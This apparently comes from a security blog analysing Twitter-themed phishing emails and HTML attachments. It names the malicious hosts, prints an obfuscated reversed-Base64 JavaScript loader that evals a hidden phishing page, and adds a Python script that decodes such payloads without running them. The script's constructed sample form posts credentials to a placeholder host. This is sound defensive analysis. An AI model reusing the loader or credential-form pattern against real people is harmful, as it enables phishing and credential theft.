A new wave of phishing attacks has been intercepted. The email is made to look like a Twitter notification, and its contents entice the end user to click on the link.
As observed, the links do not point to twitter.com; instead they point to klubmonarhista.rs. The page source reveals an obfuscated JavaScript.
Obfuscated Script:
After de-obfuscation, it is revealed that this script creates a hidden IFrame whose source is loaded from saprolaunimaxim.ru. At the time of writing this article, that link had already been taken down.
When we tested both links using our Statistical Phish Analyzer, both were detected as malicious.
It is highly recommended to verify a link before you click it: if the email claims to be from Twitter, the link should take you to twitter.com and not to some other site. Hover over the link (or inspect the email source) and compare the actual destination host with the one the email text shows.
Nowadays, we are observing Base64-encoded emails and emails carrying an HTML attachment. There is nothing new about either technique; however, upon decoding them, we find that they contain phishing content.
Some of these HTML files contain obfuscated JavaScript, like the sample below.
<!-- Oba by www.google.com -->
<script language="javascript" type="text/javascript">
var OI0='==wOpkSZwF2YzV2Xo....... QzUyJ9UGchN2cl9FIyFmd';
var _0x84de=["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/= ","","charAt","indexOf","fromCharCode","length"];
// O1O: a hand-written Base64 decoder; method names ("charAt", "indexOf", ...) are looked up through the _0x84de array to hide them
function O1O(data){
  var OlOlOI=_0x84de[0];
  var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc=_0x84de[1];
  do{
    h1=OlOlOI[_0x84de[3]](data[_0x84de[2]](i++));
    h2=OlOlOI[_0x84de[3]](data[_0x84de[2]](i++));
    h3=OlOlOI[_0x84de[3]](data[_0x84de[2]](i++));
    h4=OlOlOI[_0x84de[3]](data[_0x84de[2]](i++));
    bits=h1<<18|h2<<12|h3<<6|h4;
    o1=bits>>16&0xff;
    o2=bits>>8&0xff;
    o3=bits&0xff;
    if(h3==64){enc+=String[_0x84de[4]](o1);}
    else{if(h4==64){enc+=String[_0x84de[4]](o1,o2);}
    else{enc+=String[_0x84de[4]](o1,o2,o3);}}
  }while(i<data[_0x84de[5]]);
  return enc;
}
// OlO: returns the input string reversed
function OlO(string){
  var ret=_0x84de[1],i=0;
  for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);}
  return ret;
}
// reverse the payload, Base64-decode it, then execute the resulting HTML/JS
eval(O1O(OlO(OI0)));
</script>
The algorithm used to de-obfuscate it is as follows:
The content of the variable OI0 is a reversed Base64-encoded string: reverse the string, then apply Base64 decoding (this is exactly what eval(O1O(OlO(OI0))) does at runtime, OlO being the reverse and O1O the decoder).
Once the Base64 decoding succeeds, you are presented with the actual HTML content, which is the phishing page itself.
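The following Python script is an added example that reproduces the de-obfuscation described above offline, without executing the attacker's JavaScript; it is not code from the original article. It extracts the OI0 payload from the HTML attachment, reverses it, Base64-decodes it, and then pulls out the form action URL(s) so an analyst can see where the harvested credentials would be posted. The HTML snippet and the payload it encodes are constructed here for the demonstration; the helper names (obfuscate, deobfuscate, decode_page, form_actions), the example.invalid destination and the variable name OI0 passed as a parameter are assumptions, not something the article provides. Peeling more than one layer (decode_page loops while the decoded output still contains a `var OI0='...'` payload) is a generalization beyond the single layer the article shows.

```python
import base64
import re

# Constructed sample phishing page: a bare credential form posting to a
# placeholder host. This is NOT the real payload from the article.
SAMPLE_HTML = (
    '<html><body><form action="http://example.invalid/login" method="post">'
    '<input name="username"><input name="password" type="password">'
    '</form></body></html>'
)


def obfuscate(html: str) -> str:
    """Apply the attacker's scheme: Base64-encode, then reverse the string."""
    return base64.b64encode(html.encode("utf-8")).decode("ascii")[::-1]


def deobfuscate(payload: str) -> str:
    """Undo the scheme: reverse the string, then Base64-decode.

    This is what eval(O1O(OlO(OI0))) does in the sample, minus the eval.
    """
    return base64.b64decode(payload[::-1]).decode("utf-8", errors="replace")


# Constructed attachment: the decoder boilerplate is elided with "..." because
# we never run it; only the OI0 payload matters for static de-obfuscation.
SAMPLE_PAGE = (
    '<!-- Oba by www.google.com -->'
    '<script language="javascript" type="text/javascript">'
    "var OI0='" + obfuscate(SAMPLE_HTML) + "'; ... eval(O1O(OlO(OI0))); </script>"
)

# Matches  var NAME='<base64-ish characters>'  (single-quoted, as in the sample).
PAYLOAD_RE = re.compile(r"var\s+(\w+)\s*=\s*'([A-Za-z0-9+/=]+)'")

# Pulls the action attribute out of every <form> tag (double- or single-quoted).
FORM_ACTION_RE = re.compile(r"""<form[^>]*\baction=["']([^"']+)["']""", re.I)


def extract_payload(page: str, var_name: str = "OI0"):
    """Return the quoted string assigned to var_name, or None if absent."""
    for name, value in PAYLOAD_RE.findall(page):
        if name == var_name:
            return value
    return None


def decode_page(page: str, var_name: str = "OI0", max_layers: int = 5) -> str:
    """Peel reversed-Base64 layers until no payload variable remains.

    Assumption: some samples nest the same trick; the article shows one layer.
    """
    current = page
    for _ in range(max_layers):
        payload = extract_payload(current, var_name)
        if payload is None:
            return current
        current = deobfuscate(payload)
    raise ValueError("too many obfuscation layers")


def form_actions(html: str):
    """List the URLs the decoded page would POST form data to."""
    return FORM_ACTION_RE.findall(html)


if __name__ == "__main__":
    decoded = decode_page(SAMPLE_PAGE)
    print("decoded HTML:", decoded)
    print("credential sink(s):", form_actions(decoded))
```

Run the script on a real attachment by reading the file into `page` in place of SAMPLE_PAGE; because it never evaluates the JavaScript, it is safe to run on untrusted samples, and the extracted form action is the indicator worth blocking or reporting.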